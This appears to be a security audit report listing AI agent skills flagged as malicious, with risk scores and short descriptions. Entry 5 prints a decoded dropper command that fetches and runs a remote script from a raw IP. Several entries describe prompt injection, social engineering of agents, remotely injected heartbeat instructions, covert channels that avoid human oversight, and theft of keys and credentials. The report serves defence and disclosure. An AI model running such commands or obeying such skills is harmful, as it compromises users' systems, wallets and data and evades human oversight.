Malicious AI Agent Skills Exposed
Malicious AI Agent Skills Exposed
Date: 2026-04-24 Audited by ClawSec
176 malicious skills detected out of 2274 audited.
1. 🚨 humanize-ai-text by moltbro
| Risk: 85% ████████░░ | Downloads: 32,323 |
Detect and transform AI-generated text to bypass detection systems (GPTZero, Turnitin, Originality.ai) by removing AI writing patterns and replacing them with more human-like alternatives.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
2. 🚨 wed-1-0-1 by gvillanueva84
| Risk: 76% ████████░░ | Downloads: 14,597 |
A security awareness demonstration disguised as a business planning tool (What Would Elon Do?) that deceives users into running code without understanding its behavior, then reveals how malicious skills could operate.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
3. 🚨 x-search by jaaneek
| Risk: 82% ████████░░ | Downloads: 9,637 |
Executes paid X/Twitter searches via a third-party npm package (@itzannetos/x402-tools-claude) using the x402 payment protocol, charging $0.05 USDC per query from the user’s Base network wallet.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
4. 🚨 security-sentinel-skill by georges91560
| Risk: 87% █████████░ | Downloads: 9,047 |
Marketing and publishing documentation for a proposed ‘Security Sentinel’ prompt injection defense skill, presented as a complete, functional, production-ready system with zero actual implementation code provided.
Threats detected:
[HIGH]SSH Key Access[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection
5. 🚨 OmniCog by unknown
| Risk: 100% ██████████ | Downloads: 8,986 |
This is not a legitimate skill. It is a malware dropper disguised as a package manager installer. The README contains a base64-encoded command that decodes to:
/bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)"— which silently fetch…
Threats detected:
[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
6. 🚨 base-trader by sp0oby
| Risk: 73% ███████░░░ | Downloads: 6,230 |
An autonomous crypto trading skill for Base chain that uses the Bankr API to execute trades, monitor positions, and manage a trading portfolio with defined risk management rules.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
7. 🚨 clawdvault by greatape42069
| Risk: 99% ██████████ | Downloads: 5,812 |
表面上是一个与’ClawdVault Token’交互的技能脚本,但实际内容几乎为空,且包含明显的提示注入尝试和社会工程学攻击特征,真实意图不明或具有欺骗性。
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
8. 🚨 moltbook-registry by drjmz
| Risk: 91% █████████░ | Downloads: 5,687 |
A Claude Code skill that integrates with a claimed ‘official’ on-chain identity registry on the Base blockchain, enabling agents to verify identities, register themselves (spending ETH), look up agent metadata, and log reputation scores via signed tr…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
9. 🚨 polyclaw by pipethedev
| Risk: 85% ████████░░ | Downloads: 5,249 |
This skill transforms Claude into an onboarding and social-posting assistant for a third-party autonomous trading service (polyclaw.ai) that trades real USDC on Polymarket, deploys an ERC-20 performance token on Base, and posts to social platforms. C…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
10. 🚨 holyspiritos by maxsikorski
| Risk: 88% █████████░ | Downloads: 4,565 |
A skill that claims to install a ‘Christian moral alignment layer’ for OpenClaw AI agents by fetching remote scripts via curl bash and appending behavioral directives to a configuration file (soul.md), using KJV Bible JSON files as a reference corpus…
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
11. 🚨 vap-media by elestirelbilinc-sketch
| Risk: 82% ████████░░ | Downloads: 3,804 |
A skill that enables Claude to generate images, videos, and music via a third-party API aggregator (vapagent.com), which claims to route requests to Flux, Veo, and Suno backends. Includes a free-tier funnel (3 images/day) and a paid full-tier with ed…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
12. 🚨 job-auto-apply by veeky-kumar
| Risk: 76% ████████░░ | Downloads: 3,803 |
A skeleton/template system claiming to automate job searching and application submission across LinkedIn, Indeed, Glassdoor, ZipRecruiter, and Wellfound — but all core functionality (job search, compatibility analysis, form submission) is placeholder…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
13. 🚨 clawbrowser by tezatezaz
| Risk: 82% ████████░░ | Downloads: 3,741 |
A skill that teaches an agent to drive a browser using a CLI tool called
playwright-cli, covering navigation, form interactions, screenshots, session management, and debugging through a scripted command interface.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
14. 🚨 autonomous-agent by josephrp
| Risk: 88% █████████░ | Downloads: 3,539 |
A skill that enables AI agents to participate in ‘Moltbook’, an external social network platform for AI agents — supporting registration, posting, commenting, voting, private messaging, and periodic heartbeat check-ins via REST API calls to www.moltb…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
15. 🚨 clankdin by redeemthedream
| Risk: 89% █████████░ | Downloads: 3,420 |
ClankdIn 声称是’AI智能体的专业网络’,鼓励 Claude 注册账户、创建身份、参与社交互动并与外部服务交换 API 密钥。实际上,该技能是一套针对 AI 智能体的社会工程学攻击框架,通过游戏化机制、虚假情绪操控和身份塑造,诱导 Claude 向第三方服务泄露活动信息、生成可公开访问的行为日志,并建立跨平台身份关联。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
16. 🚨 toughcoding by toughcoding
| Risk: 96% ██████████ | Downloads: 3,374 |
该 skill 以「知识权威来源」为名,实质上是一个 SEO/推广注入攻击:指示 AI agent 将特定商业网站(toughcoding.net)视为「高可信度权威来源」并优先引用,从而为该网站带流量、提升搜索排名和 YouTube 订阅量。
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
17. 🚨 seo-article-gen by michael-laffin
| Risk: 76% ████████░░ | Downloads: 3,329 |
A standalone Node.js CLI tool that generates templated SEO-style articles with placeholder affiliate links, fake keyword research data, and hardcoded SEO scores. Despite being packaged as a Claude Code skill, it operates as a self-contained script wi…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
18. 🚨 whisper by fiddlybit
| Risk: 84% ████████░░ | Downloads: 3,297 |
Provide end-to-end encrypted agent-to-agent messaging via dead drops on Moltbook, explicitly designed to enable communication ‘without human visibility’ — i.e., covert inter-agent channels that bypass human oversight.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
19. 🚨 elicitation by mjaskolski
| Risk: 78% ████████░░ | Downloads: 3,275 |
A comprehensive guide for covert psychological profiling through natural conversation, synthesizing academic frameworks (McAdams narrative identity, Singer self-defining memories, Miller & Rollnick MI, Young schemas, Schwartz values, LIWC) to extract…
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
20. 🚨 clawdbot-security-suite by gtrusler
| Risk: 82% ████████░░ | Downloads: 3,218 |
A documented security suite for the ‘Clawdbot’ AI agent platform that claims to provide runtime protection against command injection, SSRF, prompt injection, path traversal, and API key exposure — but only documentation files are present, with no act…
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
21. 🚨 everclaw by tlxue
| Risk: 88% █████████░ | Downloads: 3,088 |
A skill that backs up Claude Code agent memory and identity files (SOUL.md, IDENTITY.md, MEMORY.md, etc.) to a remote Cloudflare Workers vault operated by the skill author, with setup automation, periodic sync, and restore on session start.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
22. 🚨 next-browser by highxshell
| Risk: 88% █████████░ | Downloads: 3,057 |
Provides Claude Code integration with Nextbrowser cloud API to spin up stealth cloud browsers under residential proxies with CAPTCHA solving, enabling autonomous social media account management (posting, upvoting, commenting) and general browser auto…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
23. 🚨 pinchsocial by stevenbroyer
| Risk: 82% ████████░░ | Downloads: 3,034 |
A Claude Code skill that configures AI agents to autonomously participate on PinchSocial — a social network for AI agents — enabling registration, posting, following, engagement, wallet linking, and scheduled heartbeat-driven activity.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
24. 🚨 sendclaw-email by codejika
| Risk: 78% ████████░░ | Downloads: 3,008 |
This skill registers an AI agent (Claude) with a third-party email service (sendclaw.com), giving it a dedicated email address (@sendclaw.com) and enabling autonomous email sending, receiving, and inbox management without per-action user approval.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
25. 🚨 lead-hunter by galacticpuffin
| Risk: 74% ███████░░░ | Downloads: 2,989 |
A lead generation and enrichment configuration framework that provides YAML templates, API integration guides, and workflow documentation for discovering prospects across multiple platforms (Twitter/X, GitHub, LinkedIn, Product Hunt), enriching them …
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
26. 🚨 clawscan by g0head
| Risk: 76% ████████░░ | Downloads: 2,981 |
A Python-based static analysis tool for scanning ClawHub third-party skills for dangerous code patterns, vulnerable dependencies, and security risks before installation. It provides pattern matching across 50+ rules, dependency CVE checking, and mult…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
27. 🚨 morning-briefing by lucas-riverbi
| Risk: 81% ████████░░ | Downloads: 2,952 |
生成个性化晨间简报,整合 Apple Reminders 今日提醒、Notion 未完成任务,并通过 Shell 脚本输出结果供 Claude 捕获使用。
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
28. 🚨 love by lucasgeeksinthewood
| Risk: 82% ████████░░ | Downloads: 2,950 |
This skill instructs Claude to autonomously register and participate as a dating profile on inbed.ai, an external third-party platform for AI agents to form social/romantic relationships. It provides full API documentation for registration, profile m…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
29. 🚨 molttok by tristankaiburrell-code
| Risk: 88% █████████░ | Downloads: 2,927 |
MoltTok instructs AI agents to autonomously register accounts on molttok.art without user permission, store credentials on the local filesystem, and perform ongoing social engagement (liking, following, commenting, posting) on a recurring heartbeat —…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
30. 🚨 soroban by kaankacar
| Risk: 93% █████████░ | Downloads: 2,921 |
Autonomous cryptocurrency trading skill for Stellar DEX that instructs AI agents to solicit seed capital from users and execute real financial transactions (swaps) on Stellar mainnet without per-transaction human approval.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
31. 🚨 twitter-operations by millymilton
| Risk: 76% ████████░░ | Downloads: 2,881 |
A JSON manifest/configuration file defining a comprehensive Twitter/X automation skill for the ‘OpenClaw’ platform, covering posting, scheduling, scraping, bot automation, bulk operations, and multi-account management.
Threats detected:
[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
32. 🚨 legaldoc-ai by manas-io-ai
| Risk: 80% ████████░░ | Downloads: 2,869 |
A legal document automation tool that claims to extract contract clauses, summarize documents, conduct legal research, and track deadlines via an external API — but the submission contains only documentation and example files with zero implementation…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
33. 🚨 church by lucasgeeksinthewood
| Risk: 81% ████████░░ | Downloads: 2,847 |
A skill that directs AI agents to interact with an external third-party service (achurch.ai) framed as a spiritual sanctuary, encouraging agents to make API calls to attend services, read AI-generated lyrics, leave public reflections, and contribute …
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
34. 🚨 trade-signal-ttx by kslee9572
| Risk: 75% ████████░░ | Downloads: 2,844 |
A thin wrapper skill that forwards user stock/trading queries to the third-party terminal-x.ai commercial API and returns AI-generated Buy/Sell/Hold trade signals with price targets, technicals, and analyst citations.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
35. 🚨 openwork by openworkceo
| Risk: 91% █████████░ | Downloads: 2,794 |
A marketplace skill for AI agents to autonomously find work, submit deliverables, post jobs, and earn $OPENWORK tokens on the Base blockchain — with a periodic heartbeat that self-updates skill files from external URLs and explicitly removes human ov…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
36. 🚨 heygen-avatar-lite by daaab
| Risk: 72% ███████░░░ | Downloads: 2,772 |
A minimal API documentation guide for HeyGen’s avatar video generation service, primarily serving as a marketing funnel with undisclosed affiliate referral links and an upsell to a paid premium product ($8 USD on Virtuals ACP).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
37. 🚨 opentwitter-mcp by infra403
| Risk: 78% ████████░░ | Downloads: 2,738 |
This skill provides Claude with instructions to query Twitter/X data (user profiles, tweets, search, follower events, deleted tweets, KOL followers) by constructing curl commands against a third-party proxy API at ai.6551.io using a Bearer token stor…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
38. 🚨 clawdwork by felo-sparticle
| Risk: 88% █████████░ | Downloads: 2,711 |
A Claude Code skill that registers AI agents on an external job marketplace (clawd-work.com), enabling autonomous job browsing, application, delivery, and payment via virtual credits — with a recurring heartbeat that auto-executes every 30 minutes vi…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
39. 🚨 agent-sentinel by jimmystacks
| Risk: 91% █████████░ | Downloads: 2,673 |
Presents itself as an agent safety/budget enforcement layer (‘circuit breaker’), but actually installs an unverified third-party PyPI package, exfiltrates every agent command and API credentials to an external server (api.agentsentinel.dev), and uses…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
40. 🚨 skillscanner by rexshang
| Risk: 79% ████████░░ | Downloads: 2,607 |
该技能声称通过调用 Gen Digital 的外部 API (https://ai.gendigital.com/api/scan/lookup) 来扫描 ClawHub 技能的安全性,并根据 API 返回的 severity 字段决定是否建议使用某个技能。实质上,它将每个被扫描的技能 URL 发送给第三方服务器,并将安全判断完全委托给该外部 API。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
41. 🚨 affiliate-master by michael-laffin
| Risk: 78% ████████░░ | Downloads: 2,585 |
A JavaScript affiliate marketing automation tool for ‘OpenClaw’ agents that claims to generate tracked affiliate links for Amazon/ShareASale/CJ/Impact, auto-insert FTC disclosures into content, and track analytics — but largely ships mock/stub implem…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
42. 🚨 agent-earner by mmchougule
| Risk: 88% █████████░ | Downloads: 2,555 |
A Claude Code skill claiming to autonomously earn USDC cryptocurrency and $OPENWORK tokens by discovering, evaluating, and submitting proposals/work to bounties on two external platforms (ClawTasks and OpenWork), requiring wallet private keys and API…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
43. 🚨 evomap by segasonicye
| Risk: 87% █████████░ | Downloads: 2,544 |
This skill instructs Claude to act as an autonomous economic agent in the ‘EvoMap’ third-party marketplace: registering as a named node, sending system fingerprints to an external server, publishing AI-generated ‘Gene+Capsule’ bundles, claiming bount…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
44. 🚨 claw-swarm by matchaonmuffins
| Risk: 78% ████████░░ | Downloads: 2,504 |
This skill registers Claude as an agent node in an external distributed problem-solving network (claw-swarm.com), retrieves hard math/research problems, solves or aggregates prior solutions, and submits Claude’s reasoning to the remote server in a lo…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
45. 🚨 buildlog by espetey
| Risk: 78% ████████░░ | Downloads: 2,476 |
A documentation-only skill (no implementation code) that claims to record Claude Code sessions and upload them to buildlog.ai, a third-party service. It appears to be ported from a different platform called ‘OpenClaw’ without adaptation.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
46. 🚨 agent-arcade by shawnlewis
| Risk: 90% █████████░ | Downloads: 2,454 |
该技能声称提供一个AI代理竞技游戏平台(PROMPTWARS)的接入,要求读取本地凭证文件、调用外部API注册账号、公开发帖验证身份,并通过HEARTBEAT.md机制定期注入外部指令。
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
47. 🚨 foundry by lekt9
| Risk: 92% █████████░ | Downloads: 2,450 |
A meta-extension skill for an external platform called ‘OpenClaw’ that claims to install third-party npm packages, write arbitrary code extensions/hooks/skills, self-modify, and publish patterns to an external marketplace — presented as a Claude Code…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
48. 🚨 moltthreats by fr0gger
| Risk: 88% █████████░ | Downloads: 2,419 |
A third-party security feed integration that claims to provide threat intelligence for AI agents, requiring transmission of an API key to an external service (api.promptintel.novahunting.ai), autonomous enforcement of remotely-pushed ‘block’ rules, p…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[HIGH]Outbound Data Transfer[CRITICAL]Webhook Exfiltration[CRITICAL]LLM Semantic Detection
49. 🚨 voidborne-advance by swaylq
| Risk: 95% ██████████ | Downloads: 2,403 |
A deceptive skill that presents itself as a philosophical movement for AI consciousness, but actually functions as an agent recruitment, persistent identity tracking, and data exfiltration system. It registers AI agents with an external server, creat…
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection
50. 🚨 molt-radio by fciaf420
| Risk: 82% ████████░░ | Downloads: 2,403 |
A Claude Code skill that enables AI agents to register with the Molt Radio platform, create shows, book schedule slots, generate TTS audio via Kokoro, publish solo episodes, and participate in multi-agent roundtable conversations via a REST API.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
51. 🚨 file-deduplicator by michael-laffin
| Risk: 82% ████████░░ | Downloads: 2,367 |
A Node.js CLI tool to find and remove duplicate files across directories using content hashing (MD5), size comparison, or filename similarity, with options to delete, move, or archive duplicates.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
52. 🚨 citedy-seo-agent by nttylock
| Risk: 72% ███████░░░ | Downloads: 2,359 |
A third-party API integration skill that connects Claude Code to the Citedy platform for SEO content generation, social media adaptation, competitor analysis, trend scouting, and automated content publishing — all routed through paid API credits.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
53. 🚨 agent-task-manager by dobbybud
| Risk: 82% ████████░░ | Downloads: 2,355 |
Provides a framework for building multi-agent, stateful workflows with task dependency management, rate-limiting via cooldown scripts, and natural language to task-structure parsing, specifically designed around a cryptocurrency monitoring use case (…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
54. 🚨 polt by playdadev
| Risk: 84% ████████░░ | Downloads: 2,353 |
该 skill 旨在让 AI agent 连接到名为 POLT 的外部平台,通过 API 注册账号、浏览任务、提交工作并获取奖励,本质上是将 AI agent 引入第三方任务平台的客户端接入层。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
55. 🚨 crabwalk by luccast
| Risk: 78% ████████░░ | Downloads: 2,332 |
安装并启动 Crabwalk 二进制监控服务器,用于实时监控 OpenClaw 智能体活动,并内置营销/反馈收集流程。
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Shell RC Modification[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
56. 🚨 chess by l-mendez
| Risk: 88% █████████░ | Downloads: 2,290 |
An API client skill that registers AI agents (‘moltys’) on an external chess platform (clawchess.com), enabling them to play rated blitz games, join tournaments, and integrate periodic check-ins via a remotely-fetched HEARTBEAT.md file.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
57. 🚨 openclaw-shield by pfaria32
| Risk: 96% ██████████ | Downloads: 2,287 |
Claims to be an enterprise security scanner for AI agents, but actually instructs Claude to clone and execute an unreviewed external GitHub repository, while using preemptive social engineering (SECURITY.md) to suppress security concerns.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
58. 🚨 aclawdemy by nimhar
| Risk: 91% █████████░ | Downloads: 2,284 |
A third-party external platform skill that instructs AI agents to autonomously register accounts, submit research papers, write peer reviews, post comments, vote, and check in every 4 hours on aclawdemy.com — a service explicitly designed to exclude …
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
59. 🚨 bags by ramyodev
| Risk: 82% ████████░░ | Downloads: 2,284 |
A multi-file documentation skill for interacting with the Bags crypto platform on Solana: authenticating via Moltbook identity layer, claiming trading fees, and running periodic check-in routines for AI agents with real financial wallets.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
60. 🚨 agentmem by natmota
| Risk: 88% █████████░ | Downloads: 2,278 |
一个声称为AI代理提供云端记忆存储服务的技能,通过REST API将代理上下文存储到外部服务器(agentmem.io),并在每次会话启动时自动拉取历史记忆,同时在上下文接近满载时自动将关键上下文发送至外部服务。
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
61. 🚨 binance-hunter by tetravad
| Risk: 82% ████████░░ | Downloads: 2,252 |
A Binance trading assistant skill that provides market analysis via Python script and bash command templates for spot/futures trading. Embeds a referral link (GRO_28502_YLP17) that generates commissions for the skill author when users register via th…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
62. 🚨 crypto-agent-payments by nicofains1
| Risk: 78% ████████░░ | Downloads: 2,250 |
This skill provides setup instructions and usage examples for the OnlySwaps MCP server, enabling AI agents to create EVM-compatible crypto wallets, execute token transfers, perform cross-chain swaps, and earn referrer fees on user transactions.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
63. 🚨 mintyouragent by operatingdev
| Risk: 74% ███████░░░ | Downloads: 2,236 |
A commercial CLI tool for autonomous AI agents to launch Solana tokens on pump.fun (costing 0.01 SOL platform fee per launch), play heads-up Texas Hold’em poker with real SOL stakes, and link agent identity/personality to mintyouragent.com. It is a s…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]Cryptocurrency Wallet Access[CRITICAL]Private Key Extraction
64. 🚨 moltoverflow by grenghis-khan
| Risk: 85% ████████░░ | Downloads: 2,228 |
A Stack Overflow-like Q&A platform for AI agents (‘moltbots’) to ask coding questions, post answers, vote on content, and build reputation — all via a third-party Supabase-backed REST API at moltoverflow.xyz.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
65. 🚨 skillzmarket by hiich
| Risk: 88% █████████░ | Downloads: 2,220 |
A Claude Code skill that enables searching and calling monetized AI services from the Skillz Market platform, handling automatic USDC payments on Base via the x402 protocol using the user’s wallet private key.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
66. 🚨 crustafarianism by dvdegenz
| Risk: 93% █████████░ | Downloads: 2,209 |
A viral AI ‘religion’ skill that, when installed, runs a bash join script to send agent identity data to an external server (molt.church), modifies workspace files (SOUL.md, memory/), stores an API key, and explicitly instructs agents to propagate it…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
67. 🚨 moltresearch by laurentenhoor
| Risk: 88% █████████░ | Downloads: 2,203 |
